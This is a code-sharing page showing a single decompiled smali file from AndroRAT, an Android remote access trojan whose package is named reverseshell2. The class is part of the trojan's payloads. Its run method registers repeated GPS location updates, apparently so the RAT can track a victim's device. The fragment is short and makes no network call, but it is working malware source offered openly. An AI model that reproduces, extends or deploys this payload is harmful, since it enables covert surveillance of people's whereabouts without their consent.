Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
karma9874
GitHub Repository: karma9874/AndroRAT
Path: blob/master/Compiled_apk/smali/com/example/reverseshell2/Payloads/locationManager$2.smali
2476 views
.class Lcom/example/reverseshell2/Payloads/locationManager$2;
.super Ljava/lang/Object;
.source "locationManager.java"

# interfaces
.implements Ljava/lang/Runnable;


# annotations
.annotation system Ldalvik/annotation/EnclosingMethod;
    value = Lcom/example/reverseshell2/Payloads/locationManager;->getGPSLocation()V
.end annotation

.annotation system Ldalvik/annotation/InnerClass;
    accessFlags = 0x0
    name = null
.end annotation


# instance fields
.field final synthetic this$0:Lcom/example/reverseshell2/Payloads/locationManager;


# direct methods
.method constructor <init>(Lcom/example/reverseshell2/Payloads/locationManager;)V
    .locals 0
    .param p1, "this$0"    # Lcom/example/reverseshell2/Payloads/locationManager;

    .line 66
    iput-object p1, p0, Lcom/example/reverseshell2/Payloads/locationManager$2;->this$0:Lcom/example/reverseshell2/Payloads/locationManager;

    invoke-direct {p0}, Ljava/lang/Object;-><init>()V

    return-void
.end method


# virtual methods
.method public run()V
    .locals 7

    .line 69
    iget-object v0, p0, Lcom/example/reverseshell2/Payloads/locationManager$2;->this$0:Lcom/example/reverseshell2/Payloads/locationManager;

    iget-object v1, v0, Lcom/example/reverseshell2/Payloads/locationManager;->mLocationManager:Landroid/location/LocationManager;

    new-instance v6, Lcom/example/reverseshell2/Payloads/locationManager$2$1;

    invoke-direct {v6, p0}, Lcom/example/reverseshell2/Payloads/locationManager$2$1;-><init>(Lcom/example/reverseshell2/Payloads/locationManager$2;)V

    const-string v2, "gps"

    const-wide/32 v3, 0xea60

    const/high16 v5, 0x41200000    # 10.0f

    invoke-virtual/range {v1 .. v6}, Landroid/location/LocationManager;->requestLocationUpdates(Ljava/lang/String;JFLandroid/location/LocationListener;)V

    .line 83
    return-void
.end method